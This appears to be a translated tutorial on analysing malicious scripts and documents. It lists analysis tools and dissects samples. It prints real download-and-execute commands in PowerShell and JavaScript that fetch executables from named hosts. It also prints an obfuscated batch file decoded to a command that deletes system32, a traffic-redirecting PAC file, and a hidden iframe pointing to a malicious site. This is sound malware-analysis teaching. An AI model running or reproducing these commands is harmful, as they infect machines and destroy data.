Foreword:
There are many types of malicious code. Not only EXE executable programs can carry malicious code, but office documents and script programs can also carry malicious code. The analysis of malicious programs is generally the same as the analysis of ordinary programs. This article mainly introduces the analysis methods of various types of malicious code and some classic malicious code analysis practices.
1. Analysis tools:
If you want to do your job well, you must first sharpen your tools. First, we will introduce the tools used to analyze malicious codes. When analyzing viruses, regardless of whether the program is really harmful, do not run it on the local machine to avoid unnecessary trouble. Virtual environments generally Do not use a version that is too high. Generally, XP is enough. You can also configure an additional win7 virtual machine. The most basic tools for static analysis of malicious programs include IDA (disassembly tool), EXEinfo (shell checking tool), and StudyPE (PE). Structure editing tool), 010Editor (binary text viewing tool), Hiew (script file viewing tool), Dnspy (net program decompilation tool). Dynamic analysis tools: Ollydbg, X64dbg. The toggle below is a list of tools I will use during the analysis process, all of which can be downloaded in Wuai Crack.
-
Tool list
-
Virtual machine environment:
-
WinXP: I love cracking dedicated virtual machines
-
Win7: self-configured
-
-
Static analysis tools: IDA, EXEinfo, StudyPE, CFF Explorer, 010Editor, Total Commander, Hiew, Dnspy
-
Dynamic analysis tools: OD, X64dbg
-
Others: fakenet
2. Classification of malicious programs:
Malicious programs can be divided into many types. According to file type, they can be divided into:
-
PE files (Windows platform executable files, such as exe and dll files)
-
ELF file (executable file under Linux platform)
-
Office document files (note that the 2007 version is a dividing point. Document files before version 07 are essentially binary files, and later are essentially compressed packages)
-
hta file (HTML application)
-
ps1 file (powershell script)
-
js file (JavaScript script)
-
VBS file (vbs script)
-
bat file (windows batch file)
-
chm file (Microsoft help document)
-
lnk file (link file)
In the process of analyzing malicious programs, it is generally necessary to archive the malicious programs according to their behavior. Common behaviors include Downloader, Virus, Dropper, Ransom, Exploits, Trojan, Redirector, and Phish.
3. Examples of script-type malicious programs:
-
Sample program: virus sample (unzip password: infected).rar
1.powershell script:
Corresponding file: 0cddd8c2084adb75689b5855a70cc4a8
The suffix name of the powershell script is .ps1. The following is the specific content of the file:
powershell.exe -noe -nol -nop -noni -w Hidden -ex Bypass -c (New-Object System.Net.WebClient).DownloadFile('http://188.120.250.154/7766.exe', '%Temp%\EUKYZG.pif');
(New-Object -com Shell.Application).ShellExecute('%Temp%\EUKYZG.pif');-
Pay attention to the Hidden parameter, which means hidden window execution. The specific command in Win10 is: -WindowStyle Hidden
-
The DownloadFile command is used to download files: Download the file http://188.120.250.154/7766.exe to the %Temp% temporary folder and rename it to EUKYZG.pif tips: The pif file is an executable file in the DOS environment. File format required for execution under Windows
-
The ShellExecute command is used to execute the specified program: Here, the downloaded program is executed.
Based on the above information, it can be inferred that this script is used to download and execute Trojans.
2.JavaScript script program:
Corresponding file: 44dcace0cfa9c0f6be1965841bc11410
The suffix of the javascript file is: .js. The following is the specific content of the file:
var lildz = new ActiveXObject("shell.application");
var am = String.fromCharCode( 99,109,100,46,101)
var kk = " h^t^tp://www.sinakhat^ibi.c^om/121016.e^xe %appdata%\\keos.exe &start %appdata%\\keos.exe"
lildz.ShellExecute (am+"xe"," /c bitsadmin /tr^an^sfer my^job /do^wnload /prio^rity hi^gh"+kk, '', 'open',0);
var defines three variables:
-
new ActiveXObject("shell.application"): used to create a shell object
-
String.fromCharCode: used to convert the subsequent Unicode encoding into characters
- The last variable is a URL, but this URL is specially separated by ^. " and ^ are the most common escape characters in CMD commands, and paired brackets will not affect the execution of the command.
Method to bypass WAF running command execution vulnerability | Lao Liang's technical station method to bypass WAF running command execution vulnerability 
https://www.bug234.com/article/61 Finally, use the ShellExecute method to start the shell script. This script is also used to download and execute Trojans.
Extension: PAC (Proxy Automatic Configuration) file is also implemented as a JavaScript function. Its core is a JavaScript function that determines whether web browsing requests (HTTP, HTTPS, and FTP) should be directly connected to the target address or forwarded to a Web proxy server and connect through proxy. Its core functions are:
function FindProxyForURL(url, host) { // ... }For Example: Take the file b5b98837ede4701a98f1467ab53160fb as an example:
function FindProxyForURL(url, host) { if (shExpMatch(host, "www.google.*")) return "PROXY 127.0.0.1:8080"; if (shExpMatch(host, "www.bing.com")) return "PROXY 127.0.0.1:8080"; return "DIRECT"; }This program redirects all Google and Bing requests to the loopback address
3.VBScript script:
Corresponding file: bc70dba947cd5df9fd750353da3faed7
The suffix of the file is: .vbs. The following is the specific content of the file: (Too much code cannot be pasted in)
dIm starts with VBS script Peugeot
4. Batch processing program:
Corresponding file: 84f1fa3c698915b91257706d1e4e3f0e
The suffix of the file is: .bat. The following is the specific content of the file:
**@echo off
c%FH_DJJU_GSG_FmJjFPRQqgdycQAzVMvfDWRo%a%FH_DJJU_GSG_FjFujOkkOOMcLovIGAGoYrZUcnjM%l%FH_DJJU_GSG_FHTVGdEtZSPwMcCCyWHZIMwDFE%l%FH_DJJU_GSG_FEBiBBlqGBpzjWbYdAUmtssHjkG% %FH_DJJU_GSG_FkfaXOiEDWPZJlPnBgVIOwkne%:%FH_DJJU_GSG_FnBIoMwczQqxBcEPVmougN%H%FH_DJJU_GSG_FTgWqkLHnwwpWCORFmFZAOrDgfQNVS%s%FH_DJJU_GSG_FmTWAAzdrAdyRZPoxdWfIwXqnSIZUs%Z%FH_DJJU_GSG_FpcDDzovELVJClgpbrAxVjHqxCnzaJa%c%FH_DJJU_GSG_FDwAhPrlrMoBPkmYTFqGtYJKEMQKEt%G%FH_DJJU_GSG_FFmsJfcZXakmGLJsyVcGLvHMriTeu%o%FH_DJJU_GSG_FqcERJTeeYmtAIeEYqHXZ% %FH_DJJU_GSG_FyJZdHGkQCZFzIECPEodzsIdWfBcyio%c%FH_DJJU_GSG_FGjuIFwEgnuBFnQzZiqjU%h%FH_DJJU_GSG_FDOiuCKlyKGzVajguDVoY%c%FH_DJJU_GSG_FagRkXxCdKUIMurtMouGxwqYZmUz%p%FH_DJJU_GSG_FaoASDpEEiuiUopYeIBhu% %FH_DJJU_GSG_FfSUoRXcLzpnGWoqYuTCwqYRixDmxJj%6%FH_DJJU_GSG_FdYNxUMGuOMYDJijNkiletlrKBURzJ%5%FH_DJJU_GSG_FKVOjRrIUbDOGNBJDzQXsJtffamStO%0%FH_DJJU_GSG_FCfbXyEYSzSmqdagQOstBqH%0%FH_DJJU_GSG_FprYRxiOhroqQKVFsjriqD%1%FH_DJJU_GSG_FZefSZaTzzRXuHHMxZHBtRQYoTiyExI%
c%FH_DJJU_GSG_FXGyLNNJmAfYMGYWhwEfhCLBhFcbeNb%a%FH_DJJU_GSG_FAiXNgfEIVAxryMNMxNnvanLuYdWqg%l%FH_DJJU_GSG_FRbiwBmWutJshuzLkSqPjqfssJfGzYn%l%FH_DJJU_GSG_FweEwywOAHlTFSvQSnKJRPXRHL% %FH_DJJU_GSG_FKqgZtBhimBXDUYgftDOfBFC%:%FH_DJJU_GSG_FxSWnrZiDEZYbGAZRDzzV%z%FH_DJJU_GSG_FrHOBDQsrvDKsAtzhwGNshdbMRr%R%FH_DJJU_GSG_FxVvukcuRAPfjRPHwNLgFjtiY%m%FH_DJJU_GSG_FULFaKRQJFlyEYIgQVVtWUnllFIiCgf%G%FH_DJJU_GSG_FmuYctzMTQnbpZqhSNcIvA%D%FH_DJJU_GSG_FrLgIvmPUUeUAVXJUIzIz%a%FH_DJJU_GSG_FaFtafIlXERVgciSbzIwwnybk%H%FH_DJJU_GSG_FjJYKBIrtedYGKAydReSgysvQVlp% %FH_DJJU_GSG_FkufGHcpMDciTYrMxhatFc%s%FH_DJJU_GSG_FxPFzIvHkurbHUmZNrXxLd%e%FH_DJJU_GSG_FJIADTVZAUSPCHyvDGqevEdPBajeO%t%FH_DJJU_GSG_FBhDDiLwMzTfYYFnfOGnnNb% %FH_DJJU_GSG_FodnqRMGynANJoVgPbTcVyugVLND%c%FH_DJJU_GSG_FHGKPvxEepqOyCfNjAqpQQw%x%FH_DJJU_GSG_FQCJDLmYNwVwwRhmhQrgw%Z%FH_DJJU_GSG_FgpiFpnCohnubmnfGNKWyZfBjT%c%FH_DJJU_GSG_FDTOBsXzhJOYhiladWFQiBoWfmNnBYw%V%FH_DJJU_GSG_FuKVLNewsYyQWfkWUGblMYtYRld%r%FH_DJJU_GSG_FFjProVUkBjkbwQlbplHawZXh%c%FH_DJJU_GSG_FBVezpjJwNknskWcvboHlKbwnzbQjl%
"%FH_DJJU_GSG_FCnxereSZqMRQBKaKMxJAmNaiZMbylM%Z%FH_DJJU_GSG_FJzEjEgciZoEMuRRdpbDSwx%m%FH_DJJU_GSG_FQiKMmpTUNqJanCsrDDWq%l%FH_DJJU_GSG_FxFLEZrpnPPLTirZkJyDRmdUne%P%FH_DJJU_GSG_FMKrXtRopKxxTpCGrlqdRoE%Z%FH_DJJU_GSG_FFoMdJSxofBqaAucTAQKNBhgQdai%E%FH_DJJU_GSG_FxmnGKeIOUOqNPJCwvLqBzXRMn%Z%FH_DJJU_GSG_FfCyBMqUeuMSRwWkwonywgBYldQUJgX%Z%FH_DJJU_GSG_FbSxrlExrQrdudwMvZUvdDzNBghm%"%FH_DJJU_GSG_FvOxbotGfJOEuZwsJrbTOeSGLN%
c%FH_DJJU_GSG_FGvrXfgZeoWCyUxBHAxvGZ%a%FH_DJJU_GSG_FmEawHwqAFXBQawusrRpxbfEqX%l%FH_DJJU_GSG_FXlUJyYTjaHkXcVMHqdsIIV%l%FH_DJJU_GSG_FoRuOejvrQKKHMkWpCwOaLO% %FH_DJJU_GSG_FCkjaSKQycOmRJcECcfZMq%:%FH_DJJU_GSG_FFEVSspNnqnSlJKXjPhtNfBmBuXk%z%FH_DJJU_GSG_FGYwBWwDlDBikvhEncEBwawW%R%FH_DJJU_GSG_FLucciiSswOArNlPchaGOc%m%FH_DJJU_GSG_FEhuGXIsPVrQZnxvYiktyIvG%G%FH_DJJU_GSG_FMnyRjDpLmQxCRCzOSdUeAhVRcs%D%FH_DJJU_GSG_FYjnVSaRvBmewJilUyTlp%a%FH_DJJU_GSG_FxquWjKAHfYaVIKrzqkNNl%H%FH_DJJU_GSG_FgihFQYIPOGKNFDGfVGOMpGEd% %FH_DJJU_GSG_FuuGuxYQhQiRBAueTdSWETGVqB%s%FH_DJJU_GSG_FpQGfbLnOTuEUZfitbepazj%e%FH_DJJU_GSG_FlsnndrSnQYHbqsbsIaSkZHCg%t%FH_DJJU_GSG_FzVpzRpdwlEMLpKJDHIgJNLbEcW% %FH_DJJU_GSG_FXoQnuFtGNaVIttPzqipfPwTYRadl%X%FH_DJJU_GSG_FFTVYClGDUpOjxNpgGgdoftL%f%FH_DJJU_GSG_FwJVsEOTJjMmADevEaVGi%G%FH_DJJU_GSG_FYNEABPShCLEWQmNjlrZqw%M%FH_DJJU_GSG_FTnuzPfcBIQDUGJMiRUziGpH%a%FH_DJJU_GSG_FGXNPdKaKzCGODVPIjRCXsiRARHtLH%h%FH_DJJU_GSG_FxCYmttgovVVmSzsGlAJz%I%FH_DJJU_GSG_FAcCQzNMBKoCJlShxZOtaa%Q%FH_DJJU_GSG_FCAuZeGYJlgQXSzWXUuBWqkhcTsKNCN%i%FH_DJJU_GSG_FCSOoGiXedKrHWTsLCGBwzRmd%
"ZmtwSE%FH_DJJU_GSG_FIcwmSzfsXVhNhiseiogzMb%5Jbg=="%FH_DJJU_GSG_FZCCZsoGCQpCMpoBzqTzEXmUpWvrpJi%
ca%FH_DJJU_GSG_FSFqbNsGkahNqIORnwlVrNxURyF%ll%FH_DJJU_GSG_FOzJLBQahFlGiZcBLLMjllMq% :%FH_DJJU_GSG_FJrBxsuvrWVpiQgWqEhbRWStFKGZ%zR%FH_DJJU_GSG_FqKpLOpjaVUEYrLYDWHLAwxxOKr%mG%FH_DJJU_GSG_FiXtOMaGxoYdVkJxBVmDIdUBIeo%Da%FH_DJJU_GSG_FSiSiUMraMxdSQDyqkvuTtZ%H %FH_DJJU_GSG_FCXlISYNGcZYSmrbYjPgOwgFIofCj%se%FH_DJJU_GSG_FeXxFbQOEvpyklgtLRzFniXVfNIHR%t %FH_DJJU_GSG_FYyWOPUIhiPzpSMvyHtSQtpYDr%At%FH_DJJU_GSG_FRugPKAvsOcfhFFOxvyZvrZzMkRf%YR%FH_DJJU_GSG_FZycmRMuwgUyLhQYfszpy%DM%FH_DJJU_GSG_FkODkunWmzDMNKtMpmhfD%pf%FH_DJJU_GSG_FWXuuvlgOuKzJarLXpTthEPBRRItW%nC%FH_DJJU_GSG_FZgtdivcReLSIowVxZjKHX%
"%FH_DJJU_GSG_FeOoJWVKNBbAkwBwXEOBi%T%FH_DJJU_GSG_FRGNotfIdBYzdPZnDJrcvONYcuBvs%0%FH_DJJU_GSG_FRZZiuLbIhcPJKWldpAbBkyBOmMLm%p%FH_DJJU_GSG_FGikYTAnsqqgZFpcfQcEqncbVZ%j%FH_DJJU_GSG_FYndXTrpPuEbsgfPFSxTvNkCnzHL%U%FH_DJJU_GSG_FXzlTBBWLfSUsmELdngLwotD%X%FH_DJJU_GSG_FZWhtyNKBcBGrqeoylVXjAKqYeE%Z%FH_DJJU_GSG_FSkcduuamUgZTzMMgsLLJJIyzk%V%FH_DJJU_GSG_FUqesSNhelGwHCgngMBuuckvyMSlOB%e%FH_DJJU_GSG_FlXHhbIBjdkmTGOQkEgnbgyFjz%G%FH_DJJU_GSG_FFgSHDqUDjpyPXDMmxSufYzctWqqoA%t%FH_DJJU_GSG_FusAyMltjpIvLZfYRqJAmYOubJZg%u%FH_DJJU_GSG_FWbTozPSHkTyijrYOpWYpjtIP%W%FH_DJJU_GSG_FTvuMuMTENiwrxhzQsYEXnKijcYyQC%A%FH_DJJU_GSG_FMYWyxZfzlNpjiSrgMQujVZjIdPErJ%=%FH_DJJU_GSG_FsIdNORqsxODHyBffNeMudJ%=%FH_DJJU_GSG_FoKiSAgCzxdoMqqbKfynyHtZCGi%"%FH_DJJU_GSG_FOpLShEHbpOEaHclLMDqOqjOV%
cal%FH_DJJU_GSG_FhTgkpdehkFYFvTmIzIxnym%l :%FH_DJJU_GSG_FPHGjbTnzDbNuqPznpkgB%zRm%FH_DJJU_GSG_FvYnOIczcpPjPmCvgtgIuNgMT%GDa%FH_DJJU_GSG_FuPgPGuEwjPtAVDfbyyNPcPgXWuqa%H s%FH_DJJU_GSG_FMHxQdguWBkxWpYagMKwLAcYq%et %FH_DJJU_GSG_FXieorZQfUDJuQLVYgpfroHZh%zPO%FH_DJJU_GSG_FtSjVotkXKytbkphnZnTjdai%RyE%FH_DJJU_GSG_FDuIXhzSOfOmkdzDTuTmSfncb%FhR%FH_DJJU_GSG_FXPseWuHmDacJvJihzZTeKci%a%FH_DJJU_GSG_FzfoyGRAuSaxQwjMGBDTIn%
"%FH_DJJU_GSG_FHJpaFgComgnLLlxMGmYZqInZQJ%a%FH_DJJU_GSG_FMoSoEZfGywTKQudhBnctIGgZwfYT%m%FH_DJJU_GSG_FvbQsiFMtDSnAkjgYcEXAdAwftAw%Z%FH_DJJU_GSG_FFYqeJJaMuZCgCgBTPiVmbxdVE%B%FH_DJJU_GSG_FYqmXghKHFHwbpSmatsJLUjoZxo%V%FH_DJJU_GSG_FJZDqGRqnNpkkUXRhUrAtKBgg%E%FH_DJJU_GSG_FcoXGXTmFFykvPCruprDpOkn%F%FH_DJJU_GSG_FZUbozzhXrEgciIwWCIRqJcxQsM%y%FH_DJJU_GSG_FLQBdviQsZpXpKCGyoFkCQLaZTT%V%FH_DJJU_GSG_FkqhrmmxfCbEReyjVBodaek%0%FH_DJJU_GSG_FjmCLSOWeaGPxJdxINIbLgZHjdkvF%N%FH_DJJU_GSG_FozDjXsrRaSrztuapdnUCYDkP%S%FH_DJJU_GSG_FXoFuoKJmdToZhXlODdfyQNzbOk%S%FH_DJJU_GSG_FPKBOEeVWtoRaEvLfVHRBWeODJsUjAP%Q%FH_DJJU_GSG_FQOLjhVBeljAwNVQAuukbkdCjmcktys%=%FH_DJJU_GSG_FtxkWMEifCLopOBstbbzfwlAqKzmink%=%FH_DJJU_GSG_FqQWeSmzMLQYeKUdnYHkCsTwZn%"%FH_DJJU_GSG_FXlQMtzDvfsNxbhLocUgHQPkSvv%
c%FH_DJJU_GSG_FSNUMHHPbNowtqrZfRYsEXGQ%a%FH_DJJU_GSG_FzxGLLjkiDsAxRAxVVKXIqRtDxzHx%l%FH_DJJU_GSG_FmDNWGyRKTszojGZnjIqfomSbFBb%l%FH_DJJU_GSG_FMEEpeCiFHGpDafCoHKbwwqd% %FH_DJJU_GSG_FbviYnwVDzsmVImBvtEjkkQN%:%FH_DJJU_GSG_FJsZUtWMBcVUsoUidWmMXp%H%FH_DJJU_GSG_FwoHKILjyZUrlEQhAJdnSsxheznKrZ%s%FH_DJJU_GSG_FvxrlpbqdZrFinIUXPkjCkbmk%Z%FH_DJJU_GSG_FQQehcGqqEeiORPxOnmHZUALyKiEcYT%c%FH_DJJU_GSG_FOynpCbFnbmrsJHMdRtXblunmLHz%G%FH_DJJU_GSG_FOffhXiFwodzYKFmbWzhcqDrMxIBLzR%o%FH_DJJU_GSG_FNQIlZfnoNqmEEZNyaKWkJeMVAm% %FH_DJJU_GSG_FrZnIywEvXhboDZAzporDenHEHC%c%FH_DJJU_GSG_FttTbykITuQLYHBZSiJHRjgfTDHlS%h%FH_DJJU_GSG_FqnluMNtMVYynpNmlaEpxWeBd%c%FH_DJJU_GSG_FRbdeKvGZNpqQzQpVKBKBAIkN%p%FH_DJJU_GSG_FAnrfOZWtGJnKgMgLMyIyi% %FH_DJJU_GSG_FABQvsRMupWbhTRWSrosI%8%FH_DJJU_GSG_FaEsnYGqhRfrEDnCeSbEO%6%FH_DJJU_GSG_FAmcvUglPafZSoOcljXwpYcR%6%FH_DJJU_GSG_FPLrARySTyDEqduPwMRxs%
%cxZcVrc%%XfGMahIQi%%AtYRDMpfnC%%zPORyEFhRa%
EXI%FH_DJJU_GSG_FBSVbiGwgbMPJXWyWbecfOUBmj%T /%FH_DJJU_GSG_FoCqprxEAObECYJmQVZlfzrAFEM%B%FH_DJJU_GSG_FyayRgicTvmjyUbQVEmiUEF%
:HsZcGo
%~1 %~2>NUL
g%FH_DJJU_GSG_FsncFEctpVPBiubqHgRlUnWYnOsiA%o%FH_DJJU_GSG_FvBCoNAZcTtvUGjXknUec%t%FH_DJJU_GSG_FHTdhLEafKqxXQntTTwPvCFImh%o%FH_DJJU_GSG_FuexfoxgCBfizubrGIGVa%:%FH_DJJU_GSG_FBHxqIjhzrgwwpXkXJlXvhIDf%e%FH_DJJU_GSG_FFSngKDJpembCwXMdBBJwobCbzA%o%FH_DJJU_GSG_FswxxEWbSODdVEwwIEEIqZbuDXP%f%FH_DJJU_GSG_FnHmLRscQkJaSRhCPcjpGUSQ%
:zRmGDaH
%~1 /p %~2=<"%~dp0%~2"
g%FH_DJJU_GSG_FYSxEdhzEulrYTsVYjQLLLVbSs%o%FH_DJJU_GSG_FHFAaOaLATmqxyWcLVmVnkOY%t%FH_DJJU_GSG_FiArNgRqoyXglqYDXGhVZIvpxqVq%o%FH_DJJU_GSG_FgzZbKPrcZfWDbTrogSMhWUfFYMV%:%FH_DJJU_GSG_FMgnsQwquCGqkChqetaoNhcwcix%e%FH_DJJU_GSG_FFTfkuGgPHHqzcLEaZNpDxMgFXY%o%FH_DJJU_GSG_FXNzpFeFfnEYyRyIIcheO%f%FH_DJJU_GSG_FrXuhMHzujbUUdtIjMBckKOpNtLg%**
This batch code has been obfuscated and encrypted. It actually executes the following two commands:
call :FH_DJJU_GSG_F calc.exe
call :FH_DJJU_GSG_F cmd.exe /c del /f /s /q c:\\windows\\system32\\*
The first command is to call a tag (:FH_DJJU_GSG_F) to run the calculator program (calc.exe). The purpose of this tag is to remove %FH_DJJU_GSG_F from each parameter, and then splice the remaining letters together. For example:
call :FH_DJJU_GSG_F c%FH_DJJU_GSG_Fa%FH_DJJU_GSG_Fl%FH_DJJU_GSG_Fc%FH_DJJU_GSG_F.%FH_DJJU_GSG_Fe%FH_DJJU_GSG_Fx%FH_DJJU_GSG_FE
Equivalent to
call :FH_DJJU_GSG_F calc.exe
The second command also calls the same label to run the command prompt program (cmd.exe) and passes a parameter (/c del /f /s /qc:\windows\system32*). This parameter means to delete all files in the system32 folder in the windows folder under the C drive, regardless of whether they are read-only, hidden or system files. This can cause the computer to not start and run properly.
4. Examples of document-based malicious programs:
-
Sample program: virus sample (unzip password: infected).rar
1.HTML application: (hta file)
Corresponding file: 0ca5700d367fc48a3de7b32a4042aa9e
The suffix of the HTA program is .hta. Open the program with Notepad:
The first suspicious place is in the first line: windowstate="minimize", which refers to executing the program with a minimized window.
Try opening a website and downloading a Trojan after running:
2.HTML file:
Corresponding file: 57651da2b0025c3fc4a12ef5c4a82603
The suffix is: .html. The following is the specific content of the file:
<html><body bgcolor="#FFFFFF"><iframe src="<http://u7z.ru:8080/index.php>" width=175 height=171 style="visibility: hidden"></iframe></body></html>
The hidden element of the visibility attribute means accessing the website http://u7z.ru:8080/index.php in a hidden way
3.PDF file:
Corresponding file: 57651da2b0025c3fc4a12ef5c4a82603
The suffix is: .pdf, try to open this pdf file:
There is no other content in the file except a hyperlink. The function of this pdf is only as a springboard to access the link:
